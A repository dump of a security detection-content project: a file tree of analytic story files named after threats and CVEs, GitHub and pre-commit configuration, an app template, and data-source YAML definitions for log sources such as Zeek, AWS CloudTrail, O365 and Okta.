├── cisa_aa22_320a.yml
├── cisa_aa23_347a.yml
├── cisa_aa24_241a.yml
├── cisco_ios_xe_software_web_management_user_interface_vulnerability.yml
├── cisco_secure_firewall_threat_defense_analytics.yml
├── citrix_netscaler_adc_and_netscaler_gateway_cve_2023_4966.yml
├── citrix_netscaler_adc_cve_2023_3519.yml
├── citrix_sharefile_rce_cve_2023_24489.yml
├── cleo_file_transfer_software.yml
├── clop_ransomware.yml
├── cloud_cryptomining.yml
├── cloud_federated_credential_abuse.yml
├── cobalt_strike.yml
├── coldroot_macos_rat.yml
├── collection_and_staging.yml
├── command_and_control.yml
├── compromised_linux_host.yml
├── compromised_user_account.yml
├── compromised_windows_host.yml
├── confluence_data_center_and_confluence_server_vulnerabilities.yml
├── connectwise_screenconnect_vulnerabilities.yml
├── credential_dumping.yml
├── critical_alerts.yml
├── crushftp_vulnerabilities.yml
├── crypto_stealer.yml
├── cve_2022_40684_fortinet_appliance_auth_bypass.yml
├── cve_2023_21716_word_rtf_heap_corruption.yml
├── cve_2023_22515_privilege_escalation_vulnerability_confluence_data_center_and_server.yml
├── cve_2023_23397_outlook_elevation_of_privilege.yml
├── cve_2023_36884_office_and_windows_html_rce_vulnerability.yml
├── cyclops_blink.yml
├── darkcrystal_rat.yml
├── darkgate_malware.yml
├── darkside_ransomware.yml
├── data_destruction.yml
├── data_exfiltration.yml
├── data_protection.yml
├── defense_evasion_or_unauthorized_access_via_sddl_tampering.yml
├── deobfuscate_decode_files_or_information.yml
├── deprecated
│ └── .gitkeep
├── derusbi.yml
├── detect_zerologon_attack.yml
├── dev_sec_ops.yml
├── dhs_report_ta18_074a.yml
├── disabling_security_tools.yml
├── dns_amplification_attacks.yml
├── dns_hijacking.yml
├── domain_trust_discovery.yml
├── double_zero_destructor.yml
├── dynamic_dns.yml
├── earth_alux.yml
├── emotet_malware_dhs_report_ta18_201a.yml
├── f5_authentication_bypass_with_tmui.yml
├── f5_big_ip_vulnerability_cve_2022_1388.yml
├── f5_tmui_rce_cve_2020_5902.yml
├── fake_captcha_campaigns.yml
├── fin7.yml
├── flax_typhoon.yml
├── forest_blizzard.yml
├── fortinet_fortinac_cve_2022_39952.yml
├── gcp_account_takeover.yml
├── gcp_cross_account_activity.yml
├── github_malicious_activity.yml
├── gomir.yml
├── gozi_malware.yml
├── graceful_wipe_out_attack.yml
├── hafnium_group.yml
├── handala_wiper.yml
├── hermetic_wiper.yml
├── hidden_cobra_malware.yml
├── icedid.yml
├── iis_components.yml
├── industroyer2.yml
├── information_sabotage.yml
├── ingress_tool_transfer.yml
├── insider_threat.yml
├── ivanti_connect_secure_vpn_vulnerabilities.yml
├── ivanti_epm_vulnerabilities.yml
├── ivanti_epmm_remote_unauthenticated_access.yml
├── ivanti_sentry_authentication_bypass_cve_2023_38035.yml
├── ivanti_virtual_traffic_manager_cve_2024_7593.yml
├── jboss_vulnerability.yml
├── jenkins_server_vulnerabilities.yml
├── jetbrains_teamcity_unauthenticated_rce.yml
├── jetbrains_teamcity_vulnerabilities.yml
├── juniper_junos_remote_code_execution.yml
├── kubernetes_scanning_activity.yml
├── kubernetes_security.yml
├── kubernetes_sensitive_object_access_activity.yml
├── linux_living_off_the_land.yml
├── linux_persistence_techniques.yml
├── linux_post_exploitation.yml
├── linux_privilege_escalation.yml
├── linux_rootkit.yml
├── living_off_the_land.yml
├── local_privilege_escalation_with_krbrelayup.yml
├── lockbit_ransomware.yml
├── log4shell_cve_2021_44228.yml
├── lumma_stealer.yml
├── malicious_powershell.yml
├── masquerading___rename_system_utilities.yml
├── medusa_ransomware.yml
├── meduza_stealer.yml
├── metasploit.yml
├── meterpreter.yml
├── microsoft_mshtml_remote_code_execution_cve_2021_40444.yml
├── microsoft_sharepoint_server_elevation_of_privilege_cve_2023_29357.yml
├── microsoft_support_diagnostic_tool_vulnerability_cve_2022_30190.yml
├── monitor_for_updates.yml
├── moonpeak.yml
├── moveit_transfer_authentication_bypass.yml
├── moveit_transfer_critical_vulnerability.yml
├── netsh_abuse.yml
├── network_discovery.yml
├── njrat.yml
├── nobelium_group.yml
├── office_365_account_takeover.yml
├── office_365_collection_techniques.yml
├── office_365_persistence_mechanisms.yml
├── okta_account_takeover.yml
├── okta_mfa_exhaustion.yml
├── openssl_cve_2022_3602.yml
├── orangeworm_attack_group.yml
├── outlook_rce_cve_2024_21378.yml
├── papercut_mf_ng_vulnerability.yml
├── petitpotam_ntlm_relay_on_active_directory_certificate_services.yml
├── phemedrone_stealer.yml
├── php_cgi_rce_attack_on_japanese_organizations.yml
├── plugx.yml
├── possible_backdoor_activity_associated_with_mudcarp_espionage_campaigns.yml
├── prestige_ransomware.yml
├── printnightmare_cve_2021_34527.yml
├── prohibited_traffic_allowed_or_protocol_mismatch.yml
├── proxynotshell.yml
├── proxyshell.yml
├── pxa_stealer.yml
├── qakbot.yml
├── ransomware.yml
├── ransomware_cloud.yml
├── redline_stealer.yml
├── remcos.yml
├── remote_monitoring_and_management_software.yml
├── reverse_network_proxy.yml
├── revil_ransomware.yml
├── rhysida_ransomware.yml
├── router_and_infrastructure_security.yml
├── ryuk_ransomware.yml
├── salt_typhoon.yml
├── samaccountname_spoofing_and_domain_controller_impersonation.yml
├── samsam_ransomware.yml
├── sandworm_tools.yml
├── sap_netweaver_exploitation.yml
├── scheduled_tasks.yml
├── seashell_blizzard.yml
├── security_solution_tampering.yml
├── shrinklocker.yml
├── signed_binary_proxy_execution_installutil.yml
├── silver_sparrow.yml
├── snake_keylogger.yml
├── snake_malware.yml
├── snappybee.yml
├── sneaky_active_directory_persistence_tricks.yml
├── spearphishing_attachments.yml
├── spring4shell_cve_2022_22965.yml
├── sql_injection.yml
├── sql_server_abuse.yml
├── storm_2460_clfs_zero_day_exploitation.yml
├── subvert_trust_controls_sip_and_trust_provider_hijacking.yml
├── suspicious_aws_login_activities.yml
├── suspicious_aws_s3_activities.yml
├── suspicious_aws_traffic.yml
├── suspicious_cloud_authentication_activities.yml
├── suspicious_cloud_instance_activities.yml
├── suspicious_cloud_provisioning_activities.yml
├── suspicious_cloud_user_activities.yml
├── suspicious_command_line_executions.yml
├── suspicious_compiled_html_activity.yml
├── suspicious_dns_traffic.yml
├── suspicious_emails.yml
├── suspicious_gcp_storage_activities.yml
├── suspicious_mshta_activity.yml
├── suspicious_okta_activity.yml
├── suspicious_regsvcs_regasm_activity.yml
├── suspicious_regsvr32_activity.yml
├── suspicious_rundll32_activity.yml
├── suspicious_windows_registry_activities.yml
├── suspicious_wmi_use.yml
├── suspicious_zoom_child_processes.yml
├── swift_slicer.yml
├── sysaid_on_prem_software_cve_2023_47246_vulnerability.yml
├── systembc.yml
├── termite_ransomware.yml
├── text4shell_cve_2022_42889.yml
├── trickbot.yml
├── trusted_developer_utilities_proxy_execution.yml
├── trusted_developer_utilities_proxy_execution_msbuild.yml
├── unusual_processes.yml
├── use_of_cleartext_protocols.yml
├── valleyrat.yml
├── vanhelsing_ransomware.yml
├── vmware_aria_operations_vrealize_cve_2023_20887.yml
├── vmware_esxi_ad_integration_authentication_bypass_cve_2024_37085.yml
├── vmware_server_side_injection_and_privilege_escalation.yml
├── volt_typhoon.yml
├── warzone_rat.yml
├── water_gamayun.yml
├── whispergate.yml
├── windealer_rat.yml
├── windows_applocker.yml
├── windows_attack_surface_reduction.yml
├── windows_audit_policy_tampering.yml
├── windows_bootkits.yml
├── windows_certificate_services.yml
├── windows_defense_evasion_tactics.yml
├── windows_discovery_techniques.yml
├── windows_dns_sigred_cve_2020_1350.yml
├── windows_drivers.yml
├── windows_error_reporting_service_elevation_of_privilege_vulnerability.yml
├── windows_file_extension_and_association_abuse.yml
├── windows_log_manipulation.yml
├── windows_persistence_techniques.yml
├── windows_post_exploitation.yml
├── windows_privilege_escalation.yml
├── windows_registry_abuse.yml
├── windows_service_abuse.yml
├── windows_system_binary_proxy_execution_msiexec.yml
├── winrar_spoofing_attack_cve_2023_38831.yml
├── winter_vivern.yml
├── wordpress_vulnerabilities.yml
├── ws_ftp_server_critical_vulnerabilities.yml
├── xmrig.yml
├── xorddos.yml
├── xworm.yml
├── zdi_can_25373_windows_shortcut_exploit_abused_as_zero_day.yml
└── zscaler_browser_proxy_threats.yml
└── workbooks
└── splunk_psa_0622.json
/.github/CODEOWNERS:
--------------------------------------------------------------------------------
1 | * @patel-bhavin @ljstella
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/feature_request.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Feature request
3 | about: Suggest an idea for this project
4 | title: ''
5 | labels: enhancement
6 | assignees: ''
7 | type: "Feature"
8 |
9 | ---
10 |
11 | **Is your feature request related to a problem? Please describe.**
12 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
13 |
14 | **Describe the solution you'd like**
15 | A clear and concise description of what you want to happen.
16 |
17 | **Describe alternatives you've considered**
18 | A clear and concise description of any alternative solutions or features you've considered.
19 |
20 | **Additional context**
21 | Add any other context or screenshots about the feature request here.
22 |
--------------------------------------------------------------------------------
/.github/config.yml:
--------------------------------------------------------------------------------
1 | # Configuration for request-info - https://github.com/behaviorbot/request-info
2 |
3 | # *Required* Comment to reply with
4 | requestInfoReplyComment: >
5 | We would appreciate it if you could provide us with more info about this issue/pr!
6 |
7 | # *OPTIONAL* default titles to check against for lack of descriptiveness
8 | # MUST BE ALL LOWERCASE
9 | requestInfoDefaultTitles:
10 | - update readme.md
11 | - updates
12 |
13 |
14 | # *OPTIONAL* Label to be added to Issues and Pull Requests with insufficient information given
15 | requestInfoLabelToAdd: needs-more-info
16 |
--------------------------------------------------------------------------------
/.github/dependabot.yml:
--------------------------------------------------------------------------------
1 | version: 2
2 | updates:
3 | - package-ecosystem: "github-actions"
4 | directory: "/"
5 | schedule:
6 | interval: "weekly"
--------------------------------------------------------------------------------
/.github/labeler.yml:
--------------------------------------------------------------------------------
1 | Detections:
2 | - changed-files:
3 | - any-glob-to-any-file:
4 | - detections/**
5 |
6 | Stories:
7 | - changed-files:
8 | - any-glob-to-any-file: stories/*
9 |
10 | Playbooks:
11 | - changed-files:
12 | - any-glob-to-any-file: playbooks/*
13 |
14 | Macros:
15 | - changed-files:
16 | - any-glob-to-any-file: macros/*
17 |
18 | Lookups:
19 | - changed-files:
20 | - any-glob-to-any-file: lookups/*
21 |
22 | Datasource:
23 | - changed-files:
24 | - any-glob-to-any-file: data_sources/*
25 |
26 | Baselines:
27 | - changed-files:
28 | - any-glob-to-any-file: baselines/*
29 |
30 |
--------------------------------------------------------------------------------
/.github/stale.yml:
--------------------------------------------------------------------------------
1 | # Number of days of inactivity before an issue becomes stale
2 | daysUntilStale: 60
3 | # Number of days of inactivity before a stale issue is closed
4 | daysUntilClose: 7
5 | # Issues with these labels will never be considered stale
6 | exemptLabels:
7 | - pinned
8 | - security
9 | # Label to use when marking an issue as stale
10 | staleLabel: wontfix
11 | # Comment to post when marking an issue as stale. Set to `false` to disable
12 | markComment: >
13 | This issue has been automatically marked as stale because it has not had
14 | recent activity. It will be closed if no further activity occurs. Thank you
15 | for your contributions.
16 | # Comment to post when closing a stale issue. Set to `false` to disable
17 | closeComment: false
18 |
--------------------------------------------------------------------------------
/.github/workflows/labeler.yml:
--------------------------------------------------------------------------------
1 | name: "Pull Request Labeler"
2 | on:
3 | - pull_request_target
4 |
5 | jobs:
6 | labeler:
7 | permissions:
8 | contents: read
9 | pull-requests: write
10 | runs-on: ubuntu-latest
11 | steps:
12 | - uses: actions/checkout@v4
13 | with:
14 | repository: "splunk/security_content"
15 | - uses: actions/labeler@v5
16 | with:
17 | sync-labels: true
18 | configuration-path: '.github/labeler.yml'
--------------------------------------------------------------------------------
/.gitpod.yml:
--------------------------------------------------------------------------------
1 | # This configuration file was automatically generated by Gitpod.
2 | # Please adjust to your needs (see https://www.gitpod.io/docs/config-gitpod-file)
3 | # and commit this file to your remote git repository to share the goodness with others.
4 |
5 | image: gitpod/workspace-python-3.9
6 |
7 | tasks:
8 | - init: pip install -r requirements.txt
9 |
10 |
11 |
--------------------------------------------------------------------------------
/.pre-commit-config.yaml:
--------------------------------------------------------------------------------
1 | repos:
2 | - repo: https://github.com/pre-commit/pre-commit-hooks
3 | rev: v4.6.0 # Use the ref you want to point at
4 | hooks:
5 | - id: check-executables-have-shebangs
6 | exclude: "package/bin/da_ess_contentupdate/|package/bin/splunklib/|venv/"
7 | - id: check-json
8 | - id: check-symlinks
9 | - id: check-yaml
10 | - id: pretty-format-json
11 | args: [--autofix]
12 | - id: requirements-txt-fixer
13 | - id: detect-aws-credentials
14 | - id: detect-private-key
15 | - id: forbid-submodules
16 |
--------------------------------------------------------------------------------
/.vscode/settings.json:
--------------------------------------------------------------------------------
1 | {
2 | "python.testing.pytestArgs": [
3 | "bin/contentctl_project"
4 | ],
5 | "python.testing.unittestEnabled": false,
6 | "python.testing.pytestEnabled": true,
7 | "python.terminal.activateEnvironment": true,
8 | "python.envFile": "${workspaceFolder}/.env",
9 | "python.testing.cwd": "${workspaceFolder}"
10 | }
--------------------------------------------------------------------------------
/CODE_OF_CONDUCT.md:
--------------------------------------------------------------------------------
1 | # Code Of Conduct
2 |
3 | The Code of Conduct for this repository can be found online [in our wiki](https://github.com/splunk/security_content/wiki/Code-of-Conduct).
--------------------------------------------------------------------------------
/app_template/README.md:
--------------------------------------------------------------------------------
1 | # Splunk ES Content Update
2 |
3 | This subscription service delivers pre-packaged Security Content for use with Splunk Enterprise Security. Subscribers get regular updates to help security practitioners more quickly address ongoing and time-sensitive customer problems and threats.
4 |
5 | Requires Splunk Enterprise Security version 4.5 or greater.
6 |
7 | For more information please visit the [Splunk ES Content Update user documentation](https://docs.splunk.com/Documentation/ESSOC).
8 |
--------------------------------------------------------------------------------
/app_template/default/data/ui/nav/default.xml:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/app_template/default/data/ui/views/feedback.xml:
--------------------------------------------------------------------------------
1 |
14 |
--------------------------------------------------------------------------------
/app_template/default/distsearch.conf:
--------------------------------------------------------------------------------
1 | [replicationSettings:refineConf]
2 | replicate.analytic_stories = false
3 |
4 | [replicationDenylist]
5 | excludeESCU = apps[/\\]DA-ESS-ContentUpdate[/\\]lookups[/\\]...
6 |
--------------------------------------------------------------------------------
/app_template/metadata/default.meta:
--------------------------------------------------------------------------------
1 | ## shared Application-level permissions
2 | []
3 | access = read : [ * ], write : [ admin, sc_admin ]
4 | export = system
5 |
6 | [savedsearches]
7 | owner = admin
8 |
--------------------------------------------------------------------------------
/app_template/static/appIcon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/app_template/static/appIcon.png
--------------------------------------------------------------------------------
/app_template/static/appIconAlt.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/app_template/static/appIconAlt.png
--------------------------------------------------------------------------------
/app_template/static/appIconAlt_2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/app_template/static/appIconAlt_2x.png
--------------------------------------------------------------------------------
/app_template/static/appIcon_2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/app_template/static/appIcon_2x.png
--------------------------------------------------------------------------------
/baselines/deprecated/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/baselines/deprecated/.gitkeep
--------------------------------------------------------------------------------
/dashboards/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/dashboards/.gitkeep
--------------------------------------------------------------------------------
/dashboards/applocker.yml:
--------------------------------------------------------------------------------
1 | name: AppLocker
2 | id: b13032c2-f0e2-48ee-8a85-ded8956c012a
3 | version: 1
4 | date: '2024-05-21'
5 | author: Michael Haag, Splunk
6 | description: Utilize this dashboard to assist with auditing and monitoring Windows AppLocker events for your endpoints. Configure the applocker macro to use the AppLocker data source for populating the dashboard.
--------------------------------------------------------------------------------
/dashboards/rmm_software_tracking.yml:
--------------------------------------------------------------------------------
1 | name: RMM Software Tracking
2 | id: 824b748b-9746-4247-b02b-f0961d6f54a5
3 | version: 1
4 | date: '2024-08-05'
5 | author: Steven Dick, Github Community
6 | description: Utilize this dashboard to assist with auditing and monitoring of Remote Monitoring and Management (RMM) alert content.
--------------------------------------------------------------------------------
/dashboards/threat_activity_by_snort_ids.yml:
--------------------------------------------------------------------------------
1 | name: Threat Activity by Snort IDs
2 | id: 77d805c2-747e-4b78-8979-52deca44254f
3 | version: 1
4 | date: '2025-04-29'
5 | author: Bhavin Patel, Nasreddine Bencherchali, Splunk
6 | description: Utilize this panel to correlate Snort intrusion events with known threat activity. Configure the Snort-ID-to-Threat lookup to enrich incoming signature data and populate the “Threat Activity by Snort IDs” view.
7 |
--------------------------------------------------------------------------------
/data_sources/aws_cloudtrail.yml:
--------------------------------------------------------------------------------
1 | name: AWS CloudTrail
2 | id: e8ace6db-1dbd-4c72-a1fb-334684619a38
3 | version: 1
4 | date: '2024-07-24'
5 | author: Patrick Bareiss, Splunk
6 | description: All AWS CloudTrail events
7 | source: aws_cloudtrail
8 | sourcetype: aws:cloudtrail
9 | separator: eventName
10 | supported_TA:
11 | - name: Splunk Add-on for AWS
12 | url: https://splunkbase.splunk.com/app/1876
13 | version: 7.10.0
14 |
--------------------------------------------------------------------------------
/data_sources/aws_cloudtrail_deleteloggingconfiguration.yml:
--------------------------------------------------------------------------------
1 | name: AWS CloudTrail DeleteLoggingConfiguration
2 | id: 24a28726-28f3-4537-a953-71bfbbc3b831
3 | version: 1
4 | date: '2025-02-21'
5 | author: Bhavin Patel, Splunk
6 | description: Data source object for AWS CloudTrail DeleteLoggingConfiguration
7 | source: aws_cloudtrail
8 | sourcetype: aws:cloudtrail
9 | separator: eventName
10 | supported_TA:
11 | - name: Splunk Add-on for AWS
12 | url: https://splunkbase.splunk.com/app/1876
13 | version: 7.10.0
14 | fields:
15 | - _time
16 | example_log: ''
17 |
--------------------------------------------------------------------------------
/data_sources/aws_cloudtrail_deleterulegroup.yml:
--------------------------------------------------------------------------------
1 | name: AWS CloudTrail DeleteRuleGroup
2 | id: 21c9b538-fa11-4bdf-9138-0dfe06b4d730
3 | version: 1
4 | date: '2025-02-21'
5 | author: Bhavin Patel, Splunk
6 | description: Data source object for AWS CloudTrail DeleteRuleGroup
7 | source: aws_cloudtrail
8 | sourcetype: aws:cloudtrail
9 | separator: eventName
10 | supported_TA:
11 | - name: Splunk Add-on for AWS
12 | url: https://splunkbase.splunk.com/app/1876
13 | version: 7.10.0
14 | fields:
15 | - _time
16 | example_log: ''
17 |
--------------------------------------------------------------------------------
/data_sources/azure_active_directory.yml:
--------------------------------------------------------------------------------
1 | name: Azure Active Directory
2 | id: 51ca21e5-bda2-4652-bb29-27c7bc18a81c
3 | version: 1
4 | date: '2024-07-18'
5 | author: Patrick Bareiss, Splunk
6 | description: All Azure Active Directory events
7 | source: Azure AD
8 | sourcetype: azure:monitor:aad
9 | separator: operationName
10 | supported_TA:
11 | - name: Splunk Add-on for Microsoft Cloud Services
12 | url: https://splunkbase.splunk.com/app/3110
13 | version: 5.5.0
14 | output_fields:
15 | - dest
16 | - user
17 | - src
18 | - vendor_account
19 | - vendor_product
20 |
--------------------------------------------------------------------------------
/data_sources/bro_conn.yml:
--------------------------------------------------------------------------------
1 | name: Bro conn
2 | id: c5a7e93b-2172-45a7-a7e9-3b217255a7f5
3 | version: 2
4 | date: '2025-01-23'
5 | author: Jacob Delgado, SnapAttack
6 | description: Logs network connection metadata captured by Zeek (formerly Bro), including
7 | details such as source and destination IPs, ports, connection state, and protocol.
8 | mitre_components:
9 | - Network Connection Creation
10 | - Network Traffic Flow
11 | - Response Metadata
12 | - Application Log Content
13 | source: bro:conn:json
14 | sourcetype: bro:conn:json
15 | supported_TA:
16 | - name: TA for Zeek
17 | url: https://splunkbase.splunk.com/app/5466
18 | version: 1.0.10
19 |
--------------------------------------------------------------------------------
/data_sources/bro_dns.yml:
--------------------------------------------------------------------------------
1 | name: Bro dns
2 | id: a4576cbf-06cc-4ed0-976c-bf06ccaed011
3 | version: 2
4 | date: '2025-01-23'
5 | author: Jacob Delgado, SnapAttack
6 | description: Logs DNS queries and responses captured by Zeek (formerly Bro), including
7 | details such as queried domains, resolved IPs, query types, and response codes.
8 | mitre_components:
9 | - Active DNS
10 | - Passive DNS
11 | - Network Traffic Content
12 | - Network Traffic Flow
13 | - Response Metadata
14 | source: bro:dns:json
15 | sourcetype: bro:dns:json
16 | supported_TA:
17 | - name: TA for Zeek
18 | url: https://splunkbase.splunk.com/app/5466
19 | version: 1.0.10
20 |
--------------------------------------------------------------------------------
/data_sources/bro_files.yml:
--------------------------------------------------------------------------------
1 | name: Bro files
2 | id: f72d34d0-3495-4826-ad34-d03495782633
3 | version: 2
4 | date: '2025-01-23'
5 | author: Jacob Delgado, SnapAttack
6 | description: Logs metadata about files transferred over the network captured by Zeek
7 | (formerly Bro), including details such as file names, hashes, MIME types, and transfer
8 | protocols.
9 | mitre_components:
10 | - File Metadata
11 | - Network Traffic Content
12 | - Network Traffic Flow
13 | - Response Metadata
14 | - Application Log Content
15 | source: bro:files:json
16 | sourcetype: bro:files:json
17 | supported_TA:
18 | - name: TA for Zeek
19 | url: https://splunkbase.splunk.com/app/5466
20 | version: 1.0.10
21 |
--------------------------------------------------------------------------------
/data_sources/bro_http.yml:
--------------------------------------------------------------------------------
1 | name: Bro http
2 | id: c5d9612b-0ffd-44d3-8247-3cf3486ec5e2
3 | version: 3
4 | date: '2025-01-23'
5 | author: Patrick Bareiss, Splunk
6 | description: Logs HTTP traffic analyzed by Zeek (formerly Bro), including details
7 | such as request methods, URLs, user agents, response codes, and headers.
8 | mitre_components:
9 | - Network Traffic Content
10 | - Network Traffic Flow
11 | - Response Content
12 | - Response Metadata
13 | - Application Log Content
14 | source: bro:http:json
15 | sourcetype: bro:http:json
16 | supported_TA:
17 | - name: TA for Zeek
18 | url: https://splunkbase.splunk.com/app/5466
19 | version: 1.0.10
20 |
--------------------------------------------------------------------------------
/data_sources/bro_loaded_scripts.yml:
--------------------------------------------------------------------------------
1 | name: Bro loaded_scripts
2 | id: 81e08a21-a735-42b1-a08a-21a73582b1bf
3 | version: 2
4 | date: '2025-01-23'
5 | author: Jacob Delgado, SnapAttack
6 | description: Logs details about the scripts loaded by Zeek (formerly Bro) during initialization,
7 | including script names and paths.
8 | mitre_components:
9 | - Application Log Content
10 | - Configuration Modification
11 | - Script Execution
12 | - OS API Execution
13 | source: bro:loaded_scripts:json
14 | sourcetype: bro:loaded_scripts:json
15 | supported_TA:
16 | - name: TA for Zeek
17 | url: https://splunkbase.splunk.com/app/5466
18 | version: 1.0.10
19 |
--------------------------------------------------------------------------------
/data_sources/bro_ntp.yml:
--------------------------------------------------------------------------------
1 | name: Bro ntp
2 | id: 3f64a544-47a4-4958-a4a5-4447a47958df
3 | version: 2
4 | date: '2025-01-23'
5 | author: Jacob Delgado, SnapAttack
6 | description: Logs Network Time Protocol (NTP) activity captured by Zeek (formerly
7 | Bro), including details such as NTP requests, responses, and server metadata.
8 | mitre_components:
9 | - Network Traffic Flow
10 | - Network Traffic Content
11 | - Response Metadata
12 | - Application Log Content
13 | source: bro:ntp:json
14 | sourcetype: bro:ntp:json
15 | supported_TA:
16 | - name: TA for Zeek
17 | url: https://splunkbase.splunk.com/app/5466
18 | version: 1.0.10
19 |
--------------------------------------------------------------------------------
/data_sources/bro_ocsp.yml:
--------------------------------------------------------------------------------
1 | name: Bro ocsp
2 | id: d20909ab-70be-409a-8909-ab70be609af1
3 | version: 2
4 | date: '2025-01-23'
5 | author: Jacob Delgado, SnapAttack
6 | description: Logs Online Certificate Status Protocol (OCSP) activity captured by Zeek
7 | (formerly Bro), including details such as certificate validation requests and responses.
8 | mitre_components:
9 | - Certificate Registration
10 | - Network Traffic Flow
11 | - Network Traffic Content
12 | - Response Metadata
13 | - Application Log Content
14 | source: bro:ocsp:json
15 | sourcetype: bro:ocsp:json
16 | supported_TA:
17 | - name: TA for Zeek
18 | url: https://splunkbase.splunk.com/app/5466
19 | version: 1.0.10
20 |
--------------------------------------------------------------------------------
/data_sources/bro_ssl.yml:
--------------------------------------------------------------------------------
1 | name: Bro ssl
2 | id: 22c637eb-f62e-41f0-8637-ebf62e11f0a8
3 | version: 2
4 | date: '2025-01-23'
5 | author: Jacob Delgado, SnapAttack
6 | description: Logs SSL/TLS handshake and session details captured by Zeek (formerly
7 | Bro), including certificates, cipher suites, and session information.
8 | mitre_components:
9 | - Certificate Registration
10 | - Network Traffic Flow
11 | - Network Traffic Content
12 | - Response Metadata
13 | - Application Log Content
14 | source: bro:ssl:json
15 | sourcetype: bro:ssl:json
16 | supported_TA:
17 | - name: TA for Zeek
18 | url: https://splunkbase.splunk.com/app/5466
19 | version: 1.0.10
20 |
--------------------------------------------------------------------------------
/data_sources/bro_weird.yml:
--------------------------------------------------------------------------------
1 | name: Bro weird
2 | id: e03762c5-c4b8-44e3-b762-c5c4b8e4e3b6
3 | version: 2
4 | date: '2025-01-23'
5 | author: Jacob Delgado, SnapAttack
6 | description: Logs anomalous or unexpected network behaviors identified by Zeek (formerly
7 | Bro), including protocol violations and unusual traffic patterns.
8 | mitre_components:
9 | - Network Traffic Flow
10 | - Network Traffic Content
11 | - Response Metadata
12 | - Application Log Content
13 | - Host Status
14 | source: bro:weird:json
15 | sourcetype: bro:weird:json
16 | supported_TA:
17 | - name: TA for Zeek
18 | url: https://splunkbase.splunk.com/app/5466
19 | version: 1.0.10
20 |
--------------------------------------------------------------------------------
/data_sources/bro_x509.yml:
--------------------------------------------------------------------------------
1 | name: Bro x509
2 | id: e8792367-64b0-47e9-b923-6764b0f7e936
3 | version: 2
4 | date: '2025-01-23'
5 | author: Jacob Delgado, SnapAttack
6 | description: Logs details about X.509 certificates observed in network traffic captured
7 | by Zeek (formerly Bro), including certificate fields, validity periods, and issuers.
8 | mitre_components:
9 | - Certificate Registration
10 | - Network Traffic Content
11 | - Response Metadata
12 | - Application Log Content
13 | - Host Status
14 | source: bro:x509:json
15 | sourcetype: bro:x509:json
16 | supported_TA:
17 | - name: TA for Zeek
18 | url: https://splunkbase.splunk.com/app/5466
19 | version: 1.0.10
20 |
--------------------------------------------------------------------------------
/data_sources/cisco_ai_defense_alerts.yml:
--------------------------------------------------------------------------------
1 | name: Cisco AI Defense Alerts
2 | id: cbb06880-9dd9-4542-ac60-bd6e1d3c3e4e
3 | version: 1
4 | date: '2024-07-18'
5 | author: Bhavin Patel
6 | description: Data source object for Cisco AI Defense Alerts
7 | source: cisco_ai_defense
8 | sourcetype: cisco:ai:defense
9 | separator: null
10 | supported_TA:
11 | - name: Cisco Security Cloud
12 | url: https://splunkbase.splunk.com/app/7404
13 | version: 3.2.3
14 | fields: null
15 |
--------------------------------------------------------------------------------
/data_sources/o365.yml:
--------------------------------------------------------------------------------
1 | name: O365
2 | id: b32de97d-0074-4cca-853c-db22c392b6c0
3 | version: 2
4 | date: '2025-01-23'
5 | author: Patrick Bareiss, Splunk
6 | description: Logs management activities in Microsoft 365, including administrative
7 | actions, user activities, and configuration changes across various services.
8 | mitre_components:
9 | - User Account Metadata
10 | - Cloud Service Modification
11 | - Application Log Content
12 | - Configuration Modification
13 | - Active Directory Object Modification
14 | source: o365
15 | sourcetype: o365:management:activity
16 | separator: Operation
17 | supported_TA:
18 | - name: Splunk Add-on for Microsoft Office 365
19 | url: https://splunkbase.splunk.com/app/4055
20 | version: 4.8.1
21 |
--------------------------------------------------------------------------------
/data_sources/office_365_universal_audit_log.yml:
--------------------------------------------------------------------------------
1 | name: Office 365 Universal Audit Log
2 | id: 86369e87-5b0b-46fe-8b96-310473dffe7f
3 | version: 1
4 | date: '2025-02-21'
5 | author: Bhavin Patel, Splunk
6 | description: Data source object for Office 365 Universal Audit Log
7 | source: o365
8 | sourcetype: o365:management:activity
9 | separator: Operation
10 | supported_TA:
11 | - name: Splunk Microsoft Office 365 Add-on
12 | url: https://splunkbase.splunk.com/app/4055
13 | version: 4.8.1
14 | fields:
15 | - _time
16 | example_log: ''
17 |
--------------------------------------------------------------------------------
/data_sources/okta.yml:
--------------------------------------------------------------------------------
1 | name: Okta
2 | id: ec26febe-e760-4981-bbee-72e107c7b9d2
3 | version: 2
4 | date: '2025-01-23'
5 | author: Patrick Bareiss, Splunk
6 | description: Logs authentication and administrative activities captured by Okta, including
7 | user login attempts, session management, and configuration changes.
8 | mitre_components:
9 | - User Account Authentication
10 | - Logon Session Creation
11 | - User Account Metadata
12 | - Configuration Modification
13 | - Application Log Content
14 | source: Okta
15 | sourcetype: OktaIM2:log
16 | supported_TA:
17 | - name: Splunk Add-on for Okta Identity Cloud
18 | url: https://splunkbase.splunk.com/app/6553
19 | version: 3.0.0
20 | output_fields:
21 | - dest
22 | - src
23 | - user
--------------------------------------------------------------------------------
/data_sources/powershell_sip_inventory.yml:
--------------------------------------------------------------------------------
1 | name: Powershell SIP Inventory
2 | id: 5ef5cb5d-1fa8-4567-b48f-27317662cd73
3 | version: 2
4 | date: '2025-01-23'
5 | author: Patrick Bareiss, Splunk
6 | description: Logs the inventory of System Integrity Policies (SIP) on a system retrieved
7 | via PowerShell, including details about policy configurations and statuses.
8 | mitre_components:
9 | - Configuration Modification
10 | - Host Status
11 | - Application Log Content
12 | - OS API Execution
13 | source: powershell://SubjectInterfacePackage
14 | sourcetype: PwSh:SubjectInterfacePackage
